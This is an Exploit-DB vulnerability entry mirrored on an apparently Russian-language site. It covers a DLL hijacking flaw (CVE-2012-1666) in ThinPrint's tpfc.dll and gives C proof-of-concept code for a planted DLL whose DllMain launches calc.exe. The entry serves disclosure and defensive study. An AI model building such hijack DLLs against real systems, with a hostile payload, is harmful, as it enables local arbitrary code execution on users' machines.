- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 37780
- Проверка EDB
-
- Пройдено
- Автор
- MOSHE ZIONI
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-2012-1666
- Дата публикации
- 2012-09-04
ThinPrint - 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution
C:
// source: https://www.securityfocus.com/bid/55421/info
ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code.
Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application.
#include <windows.h>
int hijack_poc ()
{
WinExec ( "calc.exe" , SW_NORMAL );
return 0 ;
}
BOOL WINAPI DllMain
( HINSTANCE hinstDLL ,
DWORD dwReason ,
LPVOID lpvReserved )
{
hijack_poc () ;
return 0 ;
}- Источник
- www.exploit-db.com
